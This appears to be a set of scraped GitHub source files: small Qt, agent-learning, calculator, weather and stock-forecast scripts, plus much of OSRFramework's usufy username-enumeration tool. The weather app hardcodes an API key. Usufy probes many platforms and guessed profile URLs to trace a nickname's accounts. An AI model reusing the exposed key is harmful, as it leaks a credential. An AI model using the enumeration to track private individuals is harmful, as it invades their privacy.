\"\"\"\n def __init__(self, signal=None, only=None, condition=None, name=None):\n self.callCount = 0\n self.callArgs = []\n self.senders = []\n self.lastCallArgs = None\n self.only = only\n self.condition = condition\n self.name = name\n self.signal = signal\n if signal:\n signal.connect(self)\n\n def __deinit__(self):\n if self.signal:\n self.signal.disconnect(self)\n\n def reset(self):\n self.callCount = 0\n self.callArgs = []\n self.senders = []\n self.lastCallArgs = None\n\n def test(self):\n \"\"\" Return true if the condition is true. \"\"\"\n if self.condition:\n return self.condition()\n else:\n return self.callCount > 0\n\n def set(self, *args):\n \"\"\" Set the condition to true. Alias for condition(). \"\"\"\n self.callCount += 1\n self.senders.append(QObject().sender())\n self.lastCallArgs = args\n self.callArgs.append(args)\n\n def __call__(self, *args):\n \"\"\" Called by whatever signal that triggers the condition. \"\"\"\n if self.only:\n only = self.only\n if not only(*args):\n return\n self.set(*args)\n\n def wait(self, maxMS=1000, onError=None, interval=10):\n \"\"\" Wait for the condition to be true. onError is a callback. \"\"\"\n startTime = time.time()\n success = True\n app = QApplication.instance()\n while app and not self.test():\n try:\n app.processEvents(QEventLoop.WaitForMoreEvents, interval)\n except KeyboardInterrupt as e:\n if onError:\n onError()\n break\n elapsed = ((time.time() - startTime) * 1000)\n if elapsed >= maxMS:\n break\n # else:\n # time.sleep(.1) # replace with some way to release loop directly from signal\n ret = self.test()\n return ret\n\n def assertWait(self, *args, **kwargs):\n assert self.wait(*args, **kwargs) == True\n\n\n","repo_name":"patrickkidd/pkqtbridge","sub_path":"qtbridge/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":16661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71139555711","text":"import attr\nimport typing\n\n\n@attr.s\nclass Experiment:\n intended = attr.ib()\n enacted = None\n\n def __attrs_post_init__(self):\n self.enacted = list()\n\n @property\n def label(self):\n return self.intended.label.replace(\"e\", \"E\").replace(\"r\", \"R\").replace(\">\", \"|\")\n\n\n@attr.s\nclass Interaction:\n pass\n\n\n@attr.s\nclass PrimitiveInteraction(Interaction):\n label = attr.ib()\n valence = attr.ib()\n\n\n@attr.s\nclass CompositeInteraction(Interaction):\n anterior = attr.ib()\n posterior = attr.ib()\n weight = attr.ib()\n experiment = None\n\n @property\n def label(self):\n return f\"<{self.anterior.label}{self.posterior.label}>\"\n\n @property\n def valence(self):\n return self.anterior.valence + self.posterior.valence\n\n\n@attr.s\nclass Anticipation:\n experiment = attr.ib(order=False)\n proclivity = attr.ib()\n\n\n@attr.s\nclass Environment:\n interactions = dict()\n history = [None, None]\n\n def get_interaction(self, label: str, valence: int = 0) -> Interaction:\n return self.interactions.setdefault(label, PrimitiveInteraction(label, valence))\n\n def perform(self, intended: Interaction) -> Interaction:\n enacted = None\n\n if \"e1\" in intended.label:\n if (\n self.history[1] is not None\n and \"e1\" in self.history[1].label\n and (self.history[0] is None or \"e2\" in self.history[0].label)\n ):\n enacted = self.get_interaction(\"e1r2\")\n else:\n enacted = self.get_interaction(\"e1r1\")\n else:\n if (\n self.history[1] is not None\n and \"e2\" in self.history[1].label\n and (self.history[0] is None or \"e1\" in 
self.history[0].label)\n ):\n enacted = self.get_interaction(\"e2r2\")\n else:\n enacted = self.get_interaction(\"e2r1\")\n\n self.history = [self.history[1], enacted]\n return enacted\n\n\n@attr.s\nclass Existence:\n env = attr.ib()\n\n mood = None\n memory = (None, None)\n experiments = dict()\n interactions = dict()\n\n def __attrs_post_init__(self):\n i11 = self.env.get_interaction(\"e1r1\", -1)\n i12 = self.env.get_interaction(\"e1r2\", 3)\n i21 = self.env.get_interaction(\"e2r1\", -1)\n i22 = self.env.get_interaction(\"e2r2\", 3)\n self.get_abstract_experiment(i12)\n self.get_abstract_experiment(i22)\n\n def get_experiment(self, interaction: Interaction) -> Experiment:\n experiment = Experiment(interaction)\n return self.experiments.setdefault(experiment.label, experiment)\n\n def get_abstract_experiment(self, interaction: Interaction) -> Experiment:\n experiment = self.get_experiment(interaction)\n interaction.experiment = experiment\n return experiment\n\n def get_composite_interaction(\n self, anterior: Interaction, posterior: Interaction, weight: int\n ) -> Interaction:\n interaction = CompositeInteraction(anterior, posterior, weight)\n self.get_abstract_experiment(interaction)\n self.interactions[interaction.label] = interaction\n print(\n f\"learn: {interaction.label} | {interaction.valence} | {interaction.weight}\"\n )\n return interaction\n\n def get_active(\n self, experiences: typing.List[Interaction]\n ) -> typing.List[Interaction]:\n context = []\n if experiences[0] is not None:\n context.append(experiences[0])\n\n if experiences[1] is not None:\n context.append(experiences[1])\n\n if isinstance(experiences[1], CompositeInteraction):\n context.append(experiences[1].posterior)\n\n interactions = []\n for i in self.interactions.values():\n if isinstance(i, CompositeInteraction) and i.anterior in context:\n interactions.append(i)\n return interactions\n\n def anticipate(\n self, interactions: typing.List[Interaction]\n ) -> typing.List[Anticipation]:\n\n anticipations = [\n Anticipation(e, 0)\n for e in self.experiments.values()\n if isinstance(e.intended, PrimitiveInteraction)\n ]\n\n for interaction in interactions:\n if isinstance(interaction.posterior, CompositeInteraction):\n proclivity = interaction.weight * interaction.posterior.valence\n proposition = Anticipation(interaction.posterior.experiment, proclivity)\n append = True\n for anticipation in anticipations:\n if anticipation.experiment == proposition.experiment:\n anticipation.proclivity += proposition.proclivity\n append = False\n if append:\n anticipations.append(proposition)\n\n for anticipation in anticipations:\n for enacted in anticipation.experiment.enacted:\n for interaction in interactions:\n if enacted == interaction.posterior:\n proclivity = interaction.weight * enacted.valence\n anticipation.proclivity += proclivity\n\n return anticipations\n\n def select(self, anticipations: typing.List[Anticipation]) -> Interaction:\n anticipations = list(sorted(anticipations, reverse=True))\n\n for a in anticipations[:5]:\n print(f\"propose: {a.experiment.label} | {a.proclivity}\")\n return anticipations[0].experiment\n\n def find_composite(\n self, anterior: Interaction, posterior: Interaction\n ) -> Interaction:\n for i in self.interactions.values():\n if (\n isinstance(i, CompositeInteraction)\n and i.anterior == anterior\n and i.posterior == posterior\n ):\n i.weight += 1\n print(f\"reinforce: {i.label} | {i.valence} | {i.weight}\")\n return i\n return self.get_composite_interaction(anterior, posterior, 1)\n\n 
def enact_composite(self, interaction: Interaction) -> Interaction:\n if isinstance(interaction, PrimitiveInteraction):\n return self.env.perform(interaction)\n\n anterior = self.enact_composite(interaction.anterior)\n if anterior != interaction.anterior:\n return anterior\n\n posterior = self.enact_composite(interaction.posterior)\n return self.find_composite(anterior, posterior)\n\n def step(self) -> str:\n interactions = self.get_active(self.memory)\n anticipations = self.anticipate(interactions)\n experiment = self.select(anticipations)\n\n intended = experiment.intended\n print(f\"intended: {intended.label} | {intended.valence}\")\n\n enacted = self.enact_composite(intended)\n print(f\"enacted: {enacted.label} | {enacted.valence}\")\n\n if intended != enacted:\n experiment.enacted.append(enacted)\n\n if enacted.valence >= 0:\n self.mood = \"pleased\"\n else:\n self.mood = \"pained\"\n\n experience = None\n\n if self.memory[1] is not None:\n experience = self.find_composite(self.memory[1], enacted)\n\n if self.memory[0] is not None:\n self.find_composite(self.memory[0].anterior, experience)\n self.find_composite(self.memory[0], enacted)\n\n self.memory = (experience, enacted)\n\n return self.mood\n\n\nif __name__ == \"__main__\":\n env = Environment()\n existence = Existence(env)\n\n for i in range(26):\n trace = existence.step()\n print(f\"{i:02d}: {trace}\")\n print(15 * \"-\")\n","repo_name":"uatach/ideal-course-python","sub_path":"src/050-main.py","file_name":"050-main.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"74791349949","text":"def soma(a, b):\r\n return a + b\r\n\r\ndef sub(a, b):\r\n return a - b\r\n\r\ndef multi(a, b):\r\n return a * b\r\n\r\ndef divi(a, b):\r\n if b != 0:\r\n return a / b\r\n else:\r\n return \"Não é possível dividir por zero.\"\r\n\r\ndef calc():\r\n print(\"Selecione a operação:\")\r\n print(\"1. Adição\")\r\n print(\"2. Subtração\")\r\n print(\"3. Multiplicação\")\r\n print(\"4. 
Divisão\")\r\n\r\n escolha = input(\"Digite 1/2/3/4: \")\r\n\r\n num1 = float(input(\"Digite o primeiro número: \"))\r\n num2 = float(input(\"Digite o segundo número: \"))\r\n\r\n if escolha == '1':\r\n print(\"Resultado:\", soma(num1, num2))\r\n elif escolha == '2':\r\n print(\"Resultado:\", sub(num1, num2))\r\n elif escolha == '3':\r\n print(f\"Resultado:\", multi(num1, num2))\r\n elif escolha == '4':\r\n print(\"Resultado:\", divi(num1, num2))\r\n else:\r\n print(\"Escolha inválida.\")\r\n\r\n","repo_name":"AugustoFerreira0/Atividade-da-Fabrica-dia-02","sub_path":"atividades dia 02/calculadora_usando_funcao.py","file_name":"calculadora_usando_funcao.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"70460868352","text":"from flask import Flask, render_template\nfrom flask_bootstrap import Bootstrap5\nimport requests\nimport json\nimport os\nfrom form import Form\nimport math\n\nkey = 'f2956c73dc3189c78c159f01aa7d5ad1'\n\napp = Flask(__name__)\nbootstrap = Bootstrap5(app)\napp.config['SECRET_KEY'] = os.urandom(32)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n form = Form()\n city = 'london'\n weather = requests.get(f'https://api.openweathermap.org/data/2.5/weather?q={city}&units=metric&appid=' + key)\n contents = json.loads(weather.content)\n weather_display = {\n 'city': city.capitalize(),\n 'country': contents['sys']['country'],\n 'temperature': math.ceil(contents['main']['temp']),\n 'description': contents['weather'][0]['description'],\n 'icon': contents['weather'][0]['icon'],\n 'wind_speed': contents['wind']['speed'],\n 'wind_direction': contents['wind']['deg'],\n 'min_temp': math.ceil(contents['main']['temp_min']),\n 'max_temp': math.ceil(contents['main']['temp_max']),\n # 'temp_difference': math.ceil(contents['main']['temp_max'] - contents['main']['temp_min'])\n }\n return render_template('index.html', weather_display=weather_display, form=form)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"KeithGichovi/weatherapiapp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75191443070","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport pandas_datareader as data\nfrom keras.models import load_model\nimport streamlit as st\nimport plotly.graph_objs as go\nimport yfinance as yf\nimport datetime\n\nstart = '2010-01-01'\nend ='2021-12-31'\n\nst.title(\"Stock Forecast\")\nst.markdown(\"The dashboard will help a researcher to get to know more about the stock graphs and prediction\")\n\nst.sidebar.title(\"Ticker Details\")\nst.sidebar.markdown(\"Enter Stock Ticker and Time Period you want to see data:\")\nuser_input = st.sidebar.text_input('Enter Stock Ticker','AAPL')\nstart_input = st.sidebar.date_input('Enter Start Date',datetime.date(2010, 1, 1))\nend_input = st.sidebar.date_input('Enter End Date', datetime.date(2022, 4, 22))\ndf = data.DataReader(user_input,'yahoo',start_input,end_input)\n\n\n\ntickerData = yf.Ticker(user_input)\ntickerDf = tickerData.history(period='1d',start=start_input, end = end_input)\n\nstring_logo='' % tickerData.info['logo_url']\nst.markdown(string_logo, unsafe_allow_html=True)\n\nstring_name=tickerData.info['longName']\nst.header('**%s**' % 
string_name)\n\nstring_summary=tickerData.info['longBusinessSummary']\nst.info(string_summary)\n\nst.header('**Ticker data**')\nst.write(tickerDf)\n\noption = st.sidebar.selectbox('Select Graph you want to see',('Data','Closing Vs Opening', '100MA', '200MA', 'Predicted'))\n\n\n#Data Representation\n#if option=='Data':\n# st.subheader('Data for given interval')\n# st.write(df.describe())\n\n#Graphs \nif option=='Closing Vs Opening':\n st.subheader('Closing Price Vs Time chart')\n fig = plt.figure()\n plt.plot(df.Open,'r',label='Opening Price')\n plt.plot(df.Close,'g',label='Closing Price')\n plt.legend()\n st.plotly_chart(fig,use_container_width=True)\n\nelif option=='100MA':\n st.subheader('Closing Price Vs Time chart with 100MA')\n ma100 = df.Close.rolling(100).mean()\n fig = plt.figure(figsize = (12,6))\n plt.plot(ma100)\n plt.plot(df.Close)\n st.pyplot(fig)\n\nelif option=='200MA':\n st.subheader('Closing Price Vs Time chart with 200MA')\n ma200 = df.Close.rolling(200).mean()\n ma100 = df.Close.rolling(100).mean()\n fig = plt.figure(figsize = (12,6))\n plt.plot(ma100)\n plt.plot(ma200)\n plt.plot(df.Close)\n st.pyplot(fig)\n\n#Splitting Data\ndata_training = pd.DataFrame(df['Close'][0:int(len(df)*0.70)])\ndata_testing = pd.DataFrame(df['Close'][int(len(df)*0.70):int(len(df))])\n\nfrom sklearn.preprocessing import MinMaxScaler\nscaler = MinMaxScaler(feature_range=(0,1))\n\ndata_training_array = scaler.fit_transform(data_training)\n\n\n \n#load our LSTM model\nmodel= load_model('keras_model.h5')\n\npast_100_days = data_training.tail(100)\nfinal_df = past_100_days.append(data_testing, ignore_index=True)\ninput_data = scaler.fit_transform(final_df)\n\n\nx_test = []\ny_test = []\n\nfor i in range(100, input_data.shape[0]):\n x_test.append(input_data[i-100: i])\n y_test.append(input_data[i, 0])\n\n\nx_test,y_test = np.array(x_test), np.array(y_test)\n\ny_predicted = model.predict(x_test)\n\nscaler= scaler.scale_\n\nscale_factor = 1/scaler[0]\ny_predicted = y_predicted*scale_factor\ny_test = y_test*scale_factor\n\nif option=='Predicted':\n #forecasting Graph\n st.subheader('Actual VS Predicted Graph')\n fig2= plt.figure()\n plt.plot(y_test,'b',label='Original Price')\n plt.plot(y_predicted,'r',label='Predicted')\n plt.xlabel('no of days from start date')\n plt.ylabel('Price')\n plt.legend()\n st.plotly_chart(fig2,use_container_width=True)\n","repo_name":"hanuffer/lstm","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"4806213786","text":"import argparse\nimport colorama\ncolorama.init(autoreset=True)\nimport datetime as dt\nimport json\n# global issues for multiprocessing\nfrom multiprocessing import Process, Queue, Pool\nimport os\n# Preparing to capture interruptions smoothly\nimport signal\nimport sys\nimport time\nimport traceback\nimport textwrap\n\n# configuration and utils\nimport osrframework\nimport osrframework.utils.platform_selection as platform_selection\nimport osrframework.utils.configuration as configuration\nimport osrframework.utils.banner as banner\nimport osrframework.utils.benchmark as benchmark\nimport osrframework.utils.browser as browser\nimport osrframework.utils.general as general\nfrom osrframework.utils.exceptions import *\n\n\ndef fuzzUsufy(fDomains = None, fFuzzStruct = None):\n \"\"\"\n Method to guess the usufy path against a list of domains or subdomains.\n\n Args:\n fDomains: A list to strings containing the domains and 
(optionally) a\n nick.\n fFuzzStruct: A list of strings containing the transforms to be\n performed.\n\n Returns:\n dict: A dictionary of the form of `{\"domain\": \"url\"}`.\n \"\"\"\n if fFuzzStruct == None:\n # Loading these structures by default\n fuzzingStructures = [\n \"http://<DOMAIN>/<USERNAME>\",\n \"http://<DOMAIN>/~<USERNAME>\",\n \"http://<DOMAIN>/?action=profile;user=<USERNAME>\",\n \"http://<DOMAIN>/causes/author/<USERNAME>\",\n \"http://<DOMAIN>/channel/<USERNAME>\",\n \"http://<DOMAIN>/community/profile/<USERNAME>\",\n \"http://<DOMAIN>/component/comprofiler/userprofiler/<USERNAME>\",\n \"http://<DOMAIN>/details/@<USERNAME>\",\n \"http://<DOMAIN>/foros/member.php?username=<USERNAME>\",\n \"http://<DOMAIN>/forum/member/<USERNAME>\",\n \"http://<DOMAIN>/forum/member.php?username=<USERNAME>\",\n \"http://<DOMAIN>/forum/profile.php?mode=viewprofile&u=<USERNAME>\",\n \"http://<DOMAIN>/home/<USERNAME>\",\n \"http://<DOMAIN>/index.php?action=profile;user=<USERNAME>\",\n \"http://<DOMAIN>/member_profile.php?u=<USERNAME>\",\n \"http://<DOMAIN>/member.php?username=<USERNAME>\",\n \"http://<DOMAIN>/members/?username=<USERNAME>\",\n \"http://<DOMAIN>/members/<USERNAME>\",\n \"http://<DOMAIN>/members/view/<USERNAME>\",\n \"http://<DOMAIN>/mi-espacio/<USERNAME>\",\n \"http://<DOMAIN>/u<USERNAME>\",\n \"http://<DOMAIN>/u/<USERNAME>\",\n \"http://<DOMAIN>/user-<USERNAME>\",\n \"http://<DOMAIN>/user/<USERNAME>\",\n \"http://<DOMAIN>/user/<USERNAME>.html\",\n \"http://<DOMAIN>/users/<USERNAME>\",\n \"http://<DOMAIN>/usr/<USERNAME>\",\n \"http://<DOMAIN>/usuario/<USERNAME>\",\n \"http://<DOMAIN>/usuarios/<USERNAME>\",\n \"http://<DOMAIN>/en/users/<USERNAME>\",\n \"http://<DOMAIN>/people/<USERNAME>\",\n \"http://<DOMAIN>/profil/<USERNAME>\",\n \"http://<DOMAIN>/profile/<USERNAME>\",\n \"http://<DOMAIN>/profile/page/<USERNAME>\",\n \"http://<DOMAIN>/rapidforum/index.php?action=profile;user=<USERNAME>\",\n \"http://<DOMAIN>/social/usuarios/<USERNAME>\",\n \"http://<USERNAME>.<DOMAIN>\",\n \"http://<USERNAME>.<DOMAIN>/user/<USERNAME>\"\n ]\n else:\n try:\n fuzzingStructures = fFuzzStruct.read().splitlines()\n except:\n print(\"Usufy could NOT open the following file: \" + fFuzzStruct)\n\n res = {}\n\n lines = fDomains.read().splitlines()\n\n # Going through all the lines\n for l in lines:\n domain = l.split()[0]\n print(\"Performing tests for \" + domain + \"...\")\n\n # selecting the number of nicks to be tested in this domain\n nick = l.split()[1]\n\n # possibleURLs found\n possibleURL = []\n\n for struct in fuzzingStructures:\n # initiating list\n urlToTry = struct.replace(\"<DOMAIN>\", domain)\n test = urlToTry.replace(\"<USERNAME>\", nick.lower())\n print(\"Processing \"+ test + \"...\")\n i3Browser = browser.Browser()\n try:\n html = i3Browser.recoverURL(test)\n if nick in html:\n possibleURL.append(test)\n print(general.success(\"\\tPossible usufy found!!!\\n\"))\n except:\n print(\"The resource could not be downloaded.\")\n\n res[domain] = possibleURL\n\n print(json.dumps(res, indent = 2))\n return res\n\n\ndef pool_function(p, nick, rutaDescarga, avoidProcessing=True, avoidDownload=True, verbosity=1):\n \"\"\"\n Wrapper for being able to launch all the threads of getPageWrapper.\n\n We receive the parameters for getPageWrapper as a tuple.\n\n Args:\n p: Platform where the information is stored. 
It is a string.\n nick: Nick to be searched.\n rutaDescarga: Local file where saving the obtained information.\n avoidProcessing: Boolean var that defines whether the profiles will NOT\n be processed (stored in this version).\n avoidDownload: Boolean var that defines whether the profiles will NOT be\n downloaded (stored in this version).\n verbosity: The verbosity level: 1, shows errors; 2, shows warnings.\n\n Returns:\n A dictionary with the following structure:\n {\n \t\"platform\": \"Platform\",\n \t\"status\": \"DONE\",\n \t\"data\": \"\"\n }\n Data is None or a serialized representation of the dictionary.\n \"\"\"\n try:\n res = p.get_info(\n query=nick,\n mode=\"usufy\"\n )\n return {\"platform\" : str(p), \"status\": \"Ok\", \"data\": res}\n\n except Exception as e:\n if (isinstance(e, OSRFrameworkError) and verbosity >= 1) or (isinstance(e, OSRFrameworkException) and verbosity >= 2):\n print(str(e))\n return {\"platform\" : str(p), \"status\": e, \"data\": e.generic}\n\n\ndef process_nick_list(nicks, platforms=None, rutaDescarga=\"./\", avoidProcessing=True, avoidDownload=True, nThreads=12, verbosity=1, logFolder=\"./logs\"):\n \"\"\"\n Process a list of nicks to check whether they exist.\n\n This method receives as a parameter a series of nicks and verifies whether\n those nicks have a profile associated in different social networks.\n\n Args:\n nicks: List of nicks to process.\n platforms: List of objects to be processed.\n rutaDescarga: Local file where saving the obtained information.\n avoidProcessing: A boolean var that defines whether the profiles will\n NOT be processed.\n avoidDownload: A boolean var that defines whether the profiles will NOT\n be downloaded.\n verbosity: The level of verbosity to be used.\n logFolder: The path to the log folder.\n\n Returns:\n A dictionary where the key is the nick and the value another dictionary\n where the keys are the social networks and the value is the\n corresponding URL.\n \"\"\"\n if platforms is None:\n platforms = platform_selection.get_all_platform_names(\"usufy\")\n\n # Defining the output results variable\n res = []\n # Processing the whole list of terms...\n for nick in nicks:\n # If the process is executed by the current app, we use the Processes. It is faster than pools.\n if nThreads <= 0 or nThreads > len(platforms):\n nThreads = len(platforms)\n\n # Using threads in a pool if we are not running the program in main\n # Example caught from: https://stackoverflow.com/questions/11312525/catch-ctrlc-sigint-and-exit-multiprocesses-gracefully-in-python\n try:\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(nThreads)\n signal.signal(signal.SIGINT, original_sigint_handler)\n except ValueError:\n # To avoid: ValueError: signal only works in main thread\n pool = Pool(nThreads)\n\n pool_results = []\n try:\n def log_result(result):\n # This is called whenever foo_pool(i) returns a result.\n # result_list is modified only by the main process, not the pool workers.\n pool_results.append(result)\n\n for plat in platforms:\n # We need to create all the arguments that will be needed\n parameters = (plat, nick, rutaDescarga, avoidProcessing, avoidDownload, verbosity)\n pool.apply_async(pool_function, args=parameters, callback=log_result,)\n\n # Waiting for results to be finished\n while len(pool_results) < len(platforms):\n time.sleep(1)\n\n # Closing normal termination\n pool.close()\n except KeyboardInterrupt:\n print(general.warning(\"\\n[!] Process manually stopped by the user. 
Terminating workers.\\n\"))\n            pool.terminate()\n            print(general.warning(\"[!] The following platforms were not processed:\"))\n            pending = \"\"\n            for p in platforms:\n                processed = False\n                for processedPlatform in pool_results:\n                    if str(p) == processedPlatform[\"platform\"]:\n                        processed = True\n                        break\n                if not processed:\n                    print(\"\\t- \" + str(p))\n                    pending += \" \" + str(p).lower()\n            print(\"\\n\")\n            print(general.warning(\"If you want to relaunch the app with these platforms you can always run the command with: \"))\n            print(\"\\t usufy ... -p \" + general.emphasis(pending))\n            print(\"\\n\")\n            print(general.warning(\"If you prefer to avoid these platforms you can manually evade them for whatever reason with: \"))\n            print(\"\\t usufy ... -x \" + general.emphasis(pending))\n            print(\"\\n\")\n        pool.join()\n\n        # Collecting the results\n        profiles = []\n        errors = {}\n        warnings = {}\n\n        for info in pool_results:\n            if info[\"status\"] == \"Ok\":\n                array = json.loads(info[\"data\"])\n                for r in array:\n                    if r != \"{}\":\n                        profiles.append(r)\n            else:\n                e = info[\"status\"]\n                if isinstance(e, OSRFrameworkError):\n                    aux = errors.get(e.__class__.__name__, {})\n                    aux[\"info\"] = info[\"data\"]\n                    aux[\"counter\"] = aux.get(\"counter\", 0) + 1\n                    errors[e.__class__.__name__] = aux\n                else:\n                    aux = warnings.get(e.__class__.__name__, {})\n                    aux[\"info\"] = info[\"data\"]\n                    aux[\"counter\"] = aux.get(\"counter\", 0) + 1\n                    warnings[e.__class__.__name__] = aux\n        res += profiles\n\n    if errors:\n        now = dt.datetime.now()\n        print(f\"\\n{now}\\tSome errors were found in the process:\")\n        for key, value in errors.items():\n            print(textwrap.fill(\"- {} (found: {}). Details:\".format(general.error(key), general.error(value[\"counter\"])), 90, initial_indent=\"\\t\"))\n            print(textwrap.fill(\"\\t{}\".format(value[\"info\"]), 80, initial_indent=\"\\t\"))\n\n    if warnings and verbosity >= 2:\n        now = dt.datetime.now()\n        print(\"\\n{}\\tSome warnings were found in the process:\".format(now))\n        for key, value in warnings.items():\n            print(textwrap.fill(\"- {} (found: {}). Details:\".format(general.warning(key), general.warning(value[\"counter\"])), 90, initial_indent=\"\\t\"))\n            print(textwrap.fill(\"\\t{}\".format(value[\"info\"]), 80, initial_indent=\"\\t\"))\n\n    return res\n\n\ndef get_parser():\n    \"\"\"Defines the argument parser\n\n    Returns:\n        argparse.ArgumentParser.\n    \"\"\"\n    DEFAULT_VALUES = configuration.get_configuration_values_for(\"usufy\")\n    # Capturing errors just in case the option is not found in the configuration\n    try:\n        excludeList = [DEFAULT_VALUES[\"exclude_platforms\"]]\n    except KeyError:\n        excludeList = []\n\n    # Recovering all the possible options\n    platOptions = platform_selection.get_all_platform_names(\"usufy\")\n\n    parser = argparse.ArgumentParser(description='usufy - Piece of software that checks the existence of a profile for a given user in dozens of different platforms.', prog='usufy', epilog='Check the README.md file for further details on the usage of this program or follow us on Twitter in .', add_help=False, conflict_handler='resolve')\n    parser._optionals.title = \"Input options (one required)\"\n\n    # Adding the main options\n    group_mainOptions = parser.add_mutually_exclusive_group(required=True)\n    group_mainOptions.add_argument('--info', metavar='', choices=['list_platforms', 'list_tags'], action='store', help='select the action to be performed amongst the following: list_platforms (list the details of the selected platforms), list_tags (list the tags of the selected platforms). 
Afterwards, it exits.')\n    group_mainOptions.add_argument('-b', '--benchmark', action='store_true', default=False, help='perform the benchmarking tasks.')\n    group_mainOptions.add_argument('-f', '--fuzz', metavar='', action='store', type=argparse.FileType('r'), help='this option will try to find usufy-like URLs. The list of fuzzing platforms in the file should be (one per line): \t')\n    group_mainOptions.add_argument('-l', '--list', metavar='', action='store', type=argparse.FileType('r'), help='path to the file where the list of nicks to verify is stored (one per line).')\n    group_mainOptions.add_argument('-n', '--nicks', metavar='', nargs='+', action='store', help = 'the list of nicks to process (at least one is required).')\n    group_mainOptions.add_argument('--show_tags', action='store_true', default=False, help='it will show the platforms grouped by tags.')\n\n    # Selecting the platforms where performing the search\n    groupPlatforms = parser.add_argument_group('Platform selection arguments', 'Criteria for selecting the platforms where performing the search.')\n    groupPlatforms.add_argument('-p', '--platforms', metavar='', choices=platOptions, nargs='+', required=False, default=DEFAULT_VALUES.get(\"platforms\", []), action='store', help='select the platforms where you want to perform the search amongst the following: ' + str(platOptions) + '. More than one option can be selected.')\n    groupPlatforms.add_argument('-t', '--tags', metavar='', default = [], nargs='+', required=False, action='store', help='select the list of tags that fit the platforms in which you want to perform the search. More than one option can be selected.')\n    groupPlatforms.add_argument('-x', '--exclude', metavar='', choices=platOptions, nargs='+', required=False, default=excludeList, action='store', help='select the platforms that you want to exclude from the processing.')\n\n    # Configuring the processing options\n    group_processing = parser.add_argument_group('Processing arguments', 'Configuring the way in which usufy will process the identified profiles.')\n    group_processing.add_argument('--avoid_download', required=False, action='store_true', default=False, help='argument to force usufy NOT to store the downloadable version of the profiles.')\n    group_processing.add_argument('--avoid_processing', required=False, action='store_true', default=False, help='argument to force usufy NOT to perform any processing task with the valid profiles.')\n    group_processing.add_argument('--fuzz_config', metavar='', action='store', type=argparse.FileType('r'), help='path to the fuzzing config details. Wildcards such as the domains or the nicknames should come as: , .')\n    group_processing.add_argument('--nonvalid', metavar='', required=False, default = '\\\\|<>=', action='store', help=\"string containing the characters considered as not valid for nicknames.\" )\n    group_processing.add_argument('-e', '--extension', metavar='', nargs='+', choices=['csv', 'gml', 'json', 'ods', 'png', 'txt', 'xls', 'xlsx' ], required=False, default=DEFAULT_VALUES.get(\"extension\", [\"csv\"]), action='store', help='output extension for the summary files. 
Default: csv.')\n group_processing.add_argument('-L', '--logfolder', metavar='.\n\n\"\"\"\n print(general.info(saying_hello))\n\n if args.fuzz:\n res = fuzzUsufy(args.fuzz, args.fuzz_config)\n else:\n # Recovering the list of platforms to be launched\n list_platforms = platform_selection.get_platforms_by_name(platform_names=args.platforms, tags=args.tags, mode=\"usufy\", exclude_platform_names=args.exclude)\n\n if args.info:\n # Information actions...\n if args.info == 'list_platforms':\n info_platforms =\"Listing the platforms:\\n\"\n for p in list_platforms:\n info_platforms += \"\\t\\t\" + (str(p) + \": \").ljust(16, ' ') + str(p.tags)+\"\\n\"\n return info_platforms\n elif args.info == 'list_tags':\n tags = {}\n # Going through all the selected platforms to get their tags\n for p in list_platforms:\n for t in p.tags:\n if t not in tags.keys():\n tags[t] = 1\n else:\n tags[t] += 1\n info_tags = \"List of tags:\\n\"\n # Displaying the results in a sorted list\n for t in tags.keys():\n info_tags += \"\\t\\t\" + (t + \": \").ljust(16, ' ') + str(tags[t]) + \" time(s)\\n\"\n return info_tags\n else:\n pass\n\n # performing the test\n elif args.benchmark:\n platforms = platform_selection.get_all_platform_names(\"usufy\")\n res = benchmark.do_benchmark(platforms)\n str_times = \"\"\n for e in sorted(res.keys()):\n str_times += str(e) + \"\\t\" + str(res[e]) + \"\\n\"\n return str_times\n\n # showing the tags of the usufy platforms\n elif args.show_tags:\n tags = platform_selection.get_all_platform_names_by_tag(\"usufy\")\n print(general.info(\"This is the list of platforms grouped by tag.\\n\"))\n print(json.dumps(tags, indent=2, sort_keys=True))\n print(general.info(\"[Tip] Remember that you can always launch the platform using the -t option followed by any of the aforementioned.\\n\"))\n\n # Executing the corresponding process...\n else:\n # Showing the execution time...\n start_time = dt.datetime.now()\n print(f\"{start_time}\\tStarting search in {general.emphasis(str(len(list_platforms)))} platform(s)... 
Relax!\\n\")\n print(general.emphasis(\"\\tPress to stop...\\n\"))\n\n # Defining the list of users to monitor\n nicks = []\n if args.nicks:\n for n in args.nicks:\n nicks.append(n)\n else:\n # Reading the nick files\n try:\n nicks = args.list.read().splitlines()\n except:\n print(general.error(\"ERROR: there has been an error when opening the file that stores the nicks.\\tPlease, check the existence of this file.\"))\n\n # Definning the results\n res = []\n\n if args.output_folder != None:\n # if Verifying an output folder was selected\n if not os.path.exists(args.output_folder):\n os.makedirs(args.output_folder)\n # Launching the process...\n res = process_nick_list(nicks, list_platforms, args.output_folder, avoidProcessing = args.avoid_processing, avoidDownload = args.avoid_download, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)\n\n else:\n try:\n res = process_nick_list(nicks, list_platforms, nThreads=args.threads, verbosity= args.verbose, logFolder=args.logfolder)\n except Exception as e:\n print(general.error(\"Exception grabbed when processing the nicks: \" + str(e)))\n print(general.error(traceback.print_stack()))\n\n # We are going to iterate over the results...\n str_results = \"\\t\"\n\n # Structure returned\n \"\"\"\n [\n {\n \"attributes\": [\n {\n \"attributes\": [],\n \"type\": \"com.i3visio.URI\",\n \"value\": \"http://twitter.com/i3visio\"\n },\n {\n \"attributes\": [],\n \"type\": 